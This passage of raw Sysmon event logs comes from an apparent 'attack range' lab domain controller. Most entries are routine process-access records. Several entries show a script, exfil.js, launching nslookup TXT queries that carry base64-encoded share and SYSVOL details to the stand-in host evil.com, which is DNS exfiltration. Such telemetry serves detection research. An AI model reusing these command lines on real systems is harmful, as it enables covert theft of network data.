14:16:38.352{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3841-000000005F02}7888C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.336{2E1864BB-17C6-629A-3841-000000005F02}78883336C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3741-000000005F02}7444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3841-000000005F02}7888C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3741-000000005F02}7444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-17A1-629A-783D-000000005F02}55526960C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-3741-000000005F02}7444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.322{2E1864BB-17C6-629A-3741-000000005F02}7444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliho.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.314{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltygs.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.299{2E1864BB-17C6-629A-3541-000000005F02}77525432C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3641-000000005F02}5704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.299{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.299{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.299{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.299{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.299{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3641-000000005F02}5704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.299{2E1864BB-17C6-629A-3441-000000005F02}45803644C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-3641-000000005F02}5704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.298{2E1864BB-17C6-629A-3641-000000005F02}5704C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-3441-000000005F02}4580C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltygs.tmp 2>&1 10341000x8000000000000000202242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.283{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3541-000000005F02}7752C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.283{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3541-000000005F02}7752C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-17C6-629A-3541-000000005F02}77525432C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3441-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3541-000000005F02}7752C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3441-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-17A1-629A-783D-000000005F02}55527716C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-3441-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.267{2E1864BB-17C6-629A-3441-000000005F02}4580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltygs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000202231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.645{00000000-0000-0000-0000-000000000000}6396<unknown process>-udpfalsefalse127.0.0.1-52866-false127.0.0.1-53domain 354300x8000000000000000202230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.645{00000000-0000-0000-0000-000000000000}6396<unknown process>-udptruefalse127.0.0.1-52865-false127.0.0.1-53domain 354300x8000000000000000202229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.644{00000000-0000-0000-0000-000000000000}6396<unknown process>-udpfalsefalse127.0.0.1-52864-false127.0.0.1-53domain 23542300x8000000000000000202228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.252{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltqb.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 